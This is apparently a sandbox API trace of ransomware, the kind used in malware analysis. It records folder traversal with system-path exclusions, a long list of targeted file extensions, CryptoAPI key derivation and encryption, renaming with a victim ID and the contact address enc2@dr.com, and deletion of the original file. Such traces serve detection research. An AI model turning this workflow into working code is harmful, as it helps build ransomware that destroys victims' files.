	[0175.080] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov"
	[0175.080] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\"
	[0175.080] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\"
	[0175.080] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*"
	[0175.080] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.080] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*") returned 89
	[0175.080] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.081] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*") returned 0x59
	[0175.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0175.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0175.081] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.081] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0175.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0175.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0175.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0175.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0175.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0175.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0175.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0175.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0175.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0175.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0175.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0175.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0175.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.086] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0175.086] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="..", cAlternateFileName="")) returned 1
	[0175.086] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0175.086] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0175.086] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0175.086] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0175.087] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\"
	[0175.087] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml"
	[0175.087] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml") returned 97
	[0175.087] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.087] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml") returned 0x61
	[0175.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.087] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.087] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml"
	[0175.088] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml") returned 97
	[0175.088] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.088] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.098] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.098] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.099] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.099] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.099] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.101] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x1b2, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x1b2, lpOverlapped=0x0) returned 1
	[0175.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.106] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb198) returned 1
	[0175.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.108] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0175.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.109] CryptHashData (hHash=0xfb93b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.109] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb93b0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb8f70) returned 1
	[0175.109] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.109] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x1b2, dwBufLen=0x1b2 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x1c0) returned 1
	[0175.109] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.110] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x1b2 | out: Destination=0xfdc770) 
	[0175.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.110] CryptEncrypt (in: hKey=0xfb8f70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x1b2, dwBufLen=0x1c0 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x1c0) returned 1
	[0175.110] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.111] CryptDestroyKey (hKey=0xfb8f70) returned 1
	[0175.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.111] CryptDestroyHash (hHash=0xfb93b0) returned 1
	[0175.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.111] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0175.111] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.112] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.112] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.112] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0175.113] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0175.114] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0175.114] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x1c0, lpOverlapped=0x0) returned 1
	[0175.117] CloseHandle (hObject=0x3a0) returned 1
	[0175.118] CloseHandle (hObject=0x39c) returned 1
	[0175.118] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml")) returned 1
	[0175.127] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime.xml")) returned 0
	[0175.128] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb9c845, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb9c845, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb9c845, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0175.128] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0175.128] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
